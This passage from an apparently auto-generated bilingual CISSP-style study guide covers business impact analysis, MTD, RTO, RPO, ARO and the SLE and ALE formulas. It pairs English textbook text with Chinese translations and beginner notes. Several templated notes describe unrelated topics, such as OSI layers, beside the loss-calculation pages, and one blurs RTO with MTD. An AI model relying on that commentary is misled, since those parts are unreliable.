However, most people tend to favor one type of analysis over the other. When selecting the individual members of the BCP team, try to achieve a balance between people who prefer each strategy. This approach helps develop a well-rounded BCP and will benefit the organization in the long run. The BIA process described in this chapter approaches the problem from both quantitative and qualitative points of view. However, it's tempting for a BCP team to “go with the numbers” and perform a quantitative assessment while neglecting the somewhat more subjective qualitative assessment. The BCP team should perform a qualitative analysis of the factors affecting your BCP 2.

中文直译 / 整理

风险识别 3. 可能性评估 4. 影响分析 5. 资源优先级排序 BIA 识别出对组织持续生存至关重要的业务流程和任务,以及这些资源所面 临的风险。 它还评估每种风险发生的可能性,以及这些风险事件对业务造成 的影响。 BIA 的结果为您提供定量和定性指标,有助于您优先分配业务连续 性资源,以应对组织所面临的各种本地、区域和全球风险暴露。 重要的是要认识到,业务规划者在做出决策时会使用两种不同类型的分析: 定量影响评估 涉及使用数字和公式来做出决策。 此类数据通常以业务的美 元价值来表达各种选项。 定性影响评估 考虑非数值因素,例如声誉、投资者/客户信心、员工稳定性 及其他相关问题。 此类数据通常会形成优先级类别(如高、中、低)。 定量评估和定性评估在业务连续性计划(BCP)过程中都发挥着至关重 要的作用。 然而,大多数人往往倾向于其中一种分析方式。 在选择BCP团队 的成员时,应尽量在偏好不同策略的人之间取得平衡。 这种方法有助于制定 全面的BCP,并从长远来看使组织受益。 本章所述的BIA过程从定量和定性两个角度来解决这一问题。 然而,BCP团队 很容易“依赖数据”,只进行定量评估而忽视了稍显主观的定性评估。

BCP团 队应对影响您BCP的因素进行定性分析

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 246 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 15 / PDF P247

第 247 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

process. For example, if your business is highly dependent on a few important clients, your management team is probably willing to suffer a significant short-term financial loss to retain those clients in the long term. The BCP team must sit down and discuss (preferably with the involvement of senior management) qualitative concerns to develop a comprehensive approach that satisfies all stakeholders. As you work your way through the BIA process, you will find that it is quite similar to the risk assessment process covered in Chapter 2, “Personnel Security and Risk Management Concepts.” The techniques used are very similar because both use standard risk evaluation techniques.

The major difference is that the risk assessment process is focused on individual assets, whereas the BCP focuses on business processes and tasks. Identifying Priorities The first BIA task facing the BCP team is identifying business priorities. Depending on your line of business, certain activities are essential to your day-to-day operations when disaster strikes. You should create a comprehensive list of critical business functions and rank them in order of importance. Although this task may seem somewhat daunting, it's not as hard as it sounds. These critical business functions will vary from organization to organization, based on each organization's mission.

They are the activities that, if disrupted, would jeopardize the organization's ability to achieve its goals. For example, an online retailer would treat the ability to sell products from their website and fulfill those orders promptly as critical business functions. A great way to divide the workload of this process among the team members is to assign each participant responsibility for drawing up a prioritized list that covers the business functions for which their department is responsible. When the entire BCP team convenes, team members can use those prioritized lists to create a master prioritized list for the organization as a whole.

One caution with this approach—if your team is not truly representative of the organization, you may miss critical priorities. Be sure to gather input from all

中文直译 / 整理

过程。 例如,如果您的业务高度依赖少数重要客户,您的管理团队可能愿意承 受短期的财务损失,以在长期内保留这些客户。 BCP团队必须坐下来讨论(最 好有高级管理层参与)定性问题,以制定满足所有利益相关者需求的全面方案。 在您逐步完成BIA流程的过程中,您会发现它与第2章“人员安全与风 险管理概念”中涵盖的风险评估过程非常相似。 所使用的技术非常相似, 因为两者都采用标准的风险评估技术。 主要区别在于,风险评估过程侧重 于单个资产,而BCP则侧重于业务流程和任务。 确定优先级 BCP团队面临的第一个BIA任务是确定业务优先级。 根据您的业务类型,在灾 难发生时,某些活动对您的日常运营至关重要。 您应创建一份关键业务职能的 全面清单,并按重要性进行排序。 尽管这项任务可能看似有些艰巨,但实际并 没有听起来那么困难。 这些关键业务职能会因组织而异,取决于每个组织的使命。 它们是如果中断, 将危及组织实现其目标能力的活动。 例如,在线零售商将能够通过其网站销售 产品并及时完成订单视为关键业务职能。 将此流程的工作量分配给团队成员的一个好方法是,让每位参与者负责制定一 份优先级列表,涵盖其部门所负责的业务职能。

当整个BCP团队聚集时,团队 成员可以利用这些优先级列表,为整个组织创建一份主优先级列表。 使用这种 方法时需注意——如果您的团队未能真正代表整个组织,您可能会遗漏关键的优 先事项。 请务必收集来自所有

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

标准:标准给出必须满足的最低要求。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 247 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Minimum level、mandatory requirement 常对应 standard。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 16 / PDF P248

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

parts of the organization, especially from any areas not represented on the BCP team. This process helps identify business priorities from a qualitative point of view. Recall that we're describing an attempt to develop both qualitative and quantitative BIAs simultaneously. To begin the quantitative assessment, the BCP team should sit down and draw up a list of organization assets and then assign an asset value (AV) in monetary terms to each asset. These values form the basis of risk calculations performed later in the BIA. The second quantitative measure that the team must develop is the maximum tolerable downtime (MTD), sometimes also known as maximum tolerable outage (MTO).

The MTD is the maximum length of time a business function can tolerate a disruption before suffering irreparable harm. The MTD provides valuable information when you're performing both BCP and disaster recovery planning (DRP) planning efforts. The organization's list of critical business functions plays a crucial role in this process. The MTD for critical business functions should be lower than the MTD for activities not identified as critical. Returning to the example of an online retailer, the MTD for the website selling products may be only a few minutes, whereas the MTD for their internal email system might be measured in hours.

The recovery time objective (RTO) for each business function is the amount of time in which you think you can feasibly recover the function in the event of a disruption. This value is closely related to the MTD. Once you have defined your recovery objectives, you can design and plan the procedures necessary to accomplish the recovery tasks. As you conduct your BCP work, ensure that your RTOs are less than your MTDs, resulting in a situation in which a function should never be unavailable beyond the maximum tolerable downtime.

While the RTO and MTD measure the time to recover operations and the impact of that recovery time on operations, organizations must also pay attention to the potential data loss that might occur during an availability incident. Depending on the way that information is collected, stored, and processed, some data loss may take place. The recovery point objective (RPO) is the data loss equivalent to the timefocused RTO. The RPO defines the point in time before the incident where the organization should be able to recover data from a critical business process. For example, an organization might perform database transaction log backups every 15 minutes. In that case, the RPO would be 15 minutes,

中文直译 / 整理

组织部门的意见,特别是那些未在BCP团队中代表的部门。 此过程有助于从定性角度识别业务优先级。 请记住,我们正在描述同时开发定 性和定量业务影响分析(BIA)的尝试。 为开始定量评估,BCP团队应坐下来 列出组织资产,并为每个资产分配一个资产价值(AV)(以货币形式表示)。 这些值构成了BIA后期进行风险计算的基础。 团队必须制定的第二个定量指标是最大可容忍停机时间(MTD),有时也称为 最大可容忍中断时间(MTO)。 MTD是指业务功能在遭受不可修复损害之前能 够容忍中断的最长时间。 在执行BCP和灾难恢复规划(DRP)工作时,MTD提 供了宝贵的信息。 组织的关键业务功能列表在此过程中起着至关重要的作用。 关键业务功能的MTD应低于未被认定为关键活动的MTD。 以在线零售商为例, 销售产品的网站的MTD可能只有几分钟,而其内部电子邮件系统的MTD则可 能以小时计。 每个业务功能的恢复时间目标(RTO)是指在发生中断时,您认为可行地恢复 该功能所需的时间。 该值与MTD密切相关。 一旦您确定了恢复目标,就可以 设计和规划完成恢复任务所需的程序。

在开展业务连续性计划(BCP)工作时,请确保您的RTO小于MTD,从而 确保任何功能的不可用时间都不会超过可容忍的最大停机时间。 虽然RTO和MTD衡量的是恢复操作所需的时间以及该恢复时间对操作的影 响,但组织还必须关注在可用性事件期间可能发生的潜在数据丢失。 根据 信息的收集、存储和处理方式,可能会发生某些数据丢失。 恢复点目标(RPO) 是与以时间为焦点的 RTO 相当的数据丢失量。 RPO 定义 了在事件发生前,组织应能够从关键业务流程中恢复数据的时间点。 例如,一 个组织可能每 15 分钟执行一次数据库事务日志备份。 在这种情况下,RPO 将 是 15 分钟,

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 17 / PDF P249

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

meaning that the organization may lose up to 15 minutes' worth of data after an incident. If an incident takes place at 8:30 a.m., the last transaction log backup must have occurred sometime between 8:15 a.m. and 8:30 a.m. Depending on the precise timing of the incident and the backup, the organization may have irretrievably lost between 0 and 15 minutes of data. Risk Identification The next phase of the BIA is the identification of risks posed to your organization. Recall from Chapter 1, “Security Governance Through Principles and Policies,” that a risk occurs when an asset has a vulnerability and a threat exists that might exploit that vulnerability.

During this phase, you'll have an easy time identifying some common threats, but you might need to exercise some creativity to come up with more obscure (but very real) threats to assets. Hazards come in two forms: natural and person-made. The following list includes some events that pose natural threats: Violent storms/hurricanes/tornadoes/blizzards Lightning strikes Natural wildfire Earthquakes Mudslides/avalanches Volcanic eruptions Pandemics Person-made threats may include the following events: Terrorist acts/wars/civil unrest Workplace violence Theft/vandalism Fires/arson/explosions Prolonged power outages Building collapses

中文直译 / 整理

这意味着在事件发生后,组织可能最多丢失 15 分钟的数据。 如果事件发生在 上午 8:30,那么最后一次事务日志备份必定发生在上午 8:15 至 8:30 之间的某 个时间点。 根据事件和备份的确切时间,组织可能已经永久丢失了 0 到 15 分 钟的数据。 风险识别 BIA 的下一阶段是识别对您组织构成的风险。 请回顾第1章“通过原则和政策实 现安全治理”,当资产存在漏洞且存在可能利用该漏洞的威胁时,即构成风险。 在此阶段,您将很容易识别一些常见威胁,但可能需要发挥一定的创造力,以 发现更隐蔽(但确实存在)的资产威胁。 危险分为两类:自然的和人为的。 以下列表包含一些构成自然威胁的事件: 猛烈的风暴/飓风/龙卷风/暴风雪 雷击 自然火灾 地震 泥石流/雪崩 火山喷发 大流行病 人为威胁可能包括以下事件: 恐怖袭击/战争/内乱 工作场所暴力 盗窃/破坏 火灾/纵火/爆炸 长时间停电 建筑物倒塌

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 18 / PDF P250

第 250 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Transportation failures Internet disruptions Service provider outages Economic crises Remember, these are by no means all-inclusive lists. They merely identify some common threats that many organizations face. You may want to use them as a starting point, but a full listing of risks facing your organization will require input from all members of the BCP team. The risk identification portion of the process is purely qualitative. At this point in the process, the BCP team should not be concerned about the likelihood that each type of risk will materialize or the amount of damage such an occurrence would inflict upon the continued operation of the business.

The results of this analysis will drive both the qualitative and quantitative portions of the remaining BIA tasks. Likelihood Assessment The preceding step consisted of the BCP team's drawing up a comprehensive list of the events that may pose a risk to an organization. You probably recognized that some events are much more likely to happen than others. For example, an earthquake is a much more plausible risk than a tropical storm for a business located in Southern California. A company based in Florida might have the exact opposite likelihood that each threat would occur.

To account for these differences, the next phase of the business impact analysis identifies the likelihood that each threat will occur. We describe this likelihood using the same process used for the risk assessment in Chapter 2. First, we determine the annualized rate of occurrence (ARO) that reflects the number of times a business expects to experience a given disaster each year. This annualization process simplifies comparing the magnitude of very different risks. The BCP team should sit down and determine an ARO for each threat identified in the previous section.

Base these numbers on corporate history, professional experience of team members, and advice from experts, such as meteorologists, seismologists, fire prevention professionals, and other consultants, as needed.

中文直译 / 整理

运输故障 互联网中断 服务提供商中断 经济危机 请记住,这些列表绝非详尽无遗。 它们仅列举了一些许多组织面临的常见威胁。 您可以将它们作为起点,但要全面列出贵组织面临的所有风险,还需要BCP团 队所有成员的参与。 风险识别阶段完全是定性的。 在此阶段,BCP团队不应关注每种风险发生 的可能性,或此类事件对业务持续运营造成的损害程度。 本分析的结果将 驱动后续BIA任务的定性和定量部分。 可能性评估 前一步骤是业务连续性计划(BCP)团队制定了一份可能对组织构成风险的事 件综合清单。 您可能已经意识到,某些事件发生的可能性远高于其他事件。 例 如,对于位于南加利福尼亚的企业而言,地震比热带风暴更可能是实际风险。 而一家总部位于佛罗里达州的公司,每种威胁发生的可能性则恰好相反。 为了考虑这些差异,业务影响分析的下一阶段将确定每种威胁发生的可能性。 我们使用与第2章中风险评估相同的流程来描述这种可能性。 首先,我们确定 年发生率(ARO),它反映了企业每年预期经历特定灾难的次数。 这种年度化 过程简化了对截然不同风险大小的比较。 BCP团队应坐下来为上一节中识别的每种威胁确定一个ARO。

这些数值应基 于公司历史、团队成员的专业经验以及必要时来自气象学家、地震学家、消 防专业人士和其他顾问的建议。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 250 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 19 / PDF P251

第 251 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

In addition to the government resources identified in this chapter, insurance companies develop large repositories of risk information as part of their actuarial processes. You may be able to obtain this information from them to assist in your BCP efforts. After all, you have a mutual interest in preventing damage to your business! In many cases, you may be able to find likelihood assessments for some hazards prepared by experts at no cost to you. For example, the U.S. Geological Survey (USGS) developed the earthquake hazard map shown in Figure 3.1. This map illustrates the ARO for earthquakes in various regions of the United States.

Similarly, the Federal Emergency Management Agency (FEMA) coordinates the development of detailed flood maps of local communities throughout the United States. These resources are available online and offer a wealth of information to organizations performing a business impact analysis. FIGURE 3.1 Earthquake hazard map of the United States

中文直译 / 整理

除了本章中提到的政府资源外,保险公司还会在其精算过程中建立庞大 的风险信息库。 您可能可以从他们那里获取这些信息,以协助您的BCP工作。 毕竟,您与他们都有共同利益,即防止您的业务遭受损失! 在许多情况下,您可能可以免费找到专家为某些危害所做的可能性评估。 例如, 美国地质调查局(USGS)开发了如图3.1所示的地震危险图。 该地图展示了美 国各地区地震的ARO。 同样,联邦紧急事务管理局(FEMA)协调编制了美国 各地社区的详细洪水地图。 这些资源均可在线获取,为开展业务影响分析的组 织提供了丰富的信息。 图 3.1美国地震危险性地图

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 251 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 20 / PDF P252

第 252 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

One useful online tool is the nonprofit First Street Foundation's Flood Factor, which helps you quickly identify a property's risk of flooding. See www.floodfactor.com. Impact Analysis As you may have surmised based on its name, the impact analysis phase is one of the most critical portions of the business impact analysis. In this phase, you analyze the data gathered during earlier phases to determine the impact that each identified risk would have on the business if it were to occur. From a quantitative point of view, we will cover three specific metrics: the exposure factor, the single loss expectancy, and the annualized loss expectancy.

Each one of these values describes a particular risk/asset combination evaluated during the previous phases. The exposure factor (EF) is the amount of damage that the risk poses to the asset, expressed as a percentage of the asset's value. For example, if the BCP team consults with fire experts and determines that a building fire would destroy 70 percent of the building, the exposure factor of the building to fire is 70 percent. The single loss expectancy (SLE) is the monetary loss expected each time the risk materializes.

You can compute the SLE using the following formula: Continuing with the preceding example, if the building is worth $500,000, the single loss expectancy would be 70 percent of $500,000, or $350,000. You can interpret this figure to mean that you could expect a single fire in the building would cause $350,000 worth of damage. The annualized loss expectancy (ALE) is the monetary loss that the business expects to suffer as a result of the risk harming the asset during a typical year. The SLE is the amount of damage you expect each time a disaster strikes, and the ARO (from the likelihood analysis) is the number of times you expect a disaster to occur each year.

You compute the ALE by simply multiplying those two numbers:

中文直译 / 整理

一个有用的在线工具是非营利性组织First Street基金会的Flood Factor, 它能帮助您快速识别房产的洪水风险。 请参阅www.floodfactor.com。 影响分析 正如您可能根据其名称所推测的那样,影响分析阶段是业务影响分析中最关 键的部分之一。 在这一阶段,您将分析在前期阶段收集的数据,以确定每个 已识别风险如果发生时对业务造成的影响。 从定量角度来看,我们将涵盖三个具体指标:暴露因子、单次损失预期和年 度损失预期。 这些值中的每一个都描述了在前几个阶段评估的特定风险/资 产组合。 暴露因子(EF)是指风险对资产造成的损害程度,以资产价值的百分比表示。 例如,如果BCP团队咨询消防专家后确定,建筑物火灾将摧毁建筑物70%的 结构,那么该建筑物面对火灾的暴露因子为70%。 单次损失预期(SLE)是指每次风险发生时预期的货币损失。 您可以使用以下公式 计算SLE: 继续前面的例子,如果该建筑价值500,000美元,则单次损失预期为500,000美 元的70%,即350,000美元。 您可以将此数字理解为:该建筑发生一次火灾可 能导致350,000美元的损失。

年度预期损失(ALE)是指企业在典型一年内因风险损害资产而预期遭受的货 币损失。 单次损失预期(SLE)是每次灾难发生时你预期的损失金额,而年度 发生率(ARO,来自可能性分析)是你预期每年发生灾难的次数。 你只需将这 两个数字相乘即可计算出ALE:

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 252 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 21 / PDF P253

第 253 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Returning once again to our building example, fire experts might predict that a fire will occur in the building approximately once every 30 years, specifically determining that there is a 0.03 chance of a fire in any given year. The ALE is then 3 percent of the $350,000 SLE, or $10,500. You can interpret this figure to mean that the business should expect to lose $10,500 each year due to a fire in the building. Obviously, a fire will not occur each year—this figure represents the average cost over the approximately 30 years between fires.

It's not especially useful for budgeting considerations but proves invaluable when attempting to prioritize the assignment of BCP resources to a given risk. Of course, a business leader may decide that the risk of fire remains unacceptable and take actions that contradict the quantitative assessment. That's where qualitative assessment comes into play. Be sure you're familiar with the quantitative formulas contained in this chapter, and the concepts of asset value, exposure factor, the annualized rate of occurrence, single loss expectancy, and annualized loss expectancy. Know the formulas and be able to work through a scenario.

From a qualitative point of view, you must consider the nonmonetary impact that interruptions might have on your business. For example, you might want to consider the following: Loss of goodwill among your client base Loss of employees to other jobs after prolonged downtime Social/ethical responsibilities to the community Negative publicity It's difficult to put dollar values on items like these to include them in the quantitative portion of the impact analysis, but they are equally important. After all, if you decimate your client base, you won't have a business to return to when you're ready to resume operations.

中文直译 / 整理

再次以我们的建筑物为例,火灾专家可能预测火灾大约每30年会在建筑物中发生一次, 具体确定每年发生火灾的概率为 0.03。 因此,ALE 为 $350,000 SLE 的 3%, 即 $10,500。 你可以将这一数字理解为:由于建筑物发生火灾,企业每年预计 会损失 $10,500。 显然,火灾并不会每年发生——这一数字代表了大约每 30 年发生一次火灾的 平均成本。 它对预算规划的帮助不大,但在试图优先分配 BCP 资源以应对特 定风险时却极为有用。 当然,企业领导者可能会认为火灾风险仍然不可接受, 并采取与定量评估相悖的措施。 这时,定性评估就发挥作用了。 请确保您熟悉本章中包含的定量公式,以及资产价值、暴露因子、 年发生率、单次损失预期和年度损失预期等概念。 掌握这些公式,并 能够通过实际场景进行计算。 从定性角度来看,您必须考虑中断可能对您的业务造成的非货币影响。 例如, 您可能需要考虑以下方面: 客户基础中的善意损失 长时间停机后员工流失到其他工作 对社区的社会/道德责任 负面宣传 很难为这类项目赋予美元价值并将其纳入影响分析的定量部分,但它们同样重 要。

毕竟,如果你摧毁了客户群,当你准备恢复运营时,将没有任何业务可回 归。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

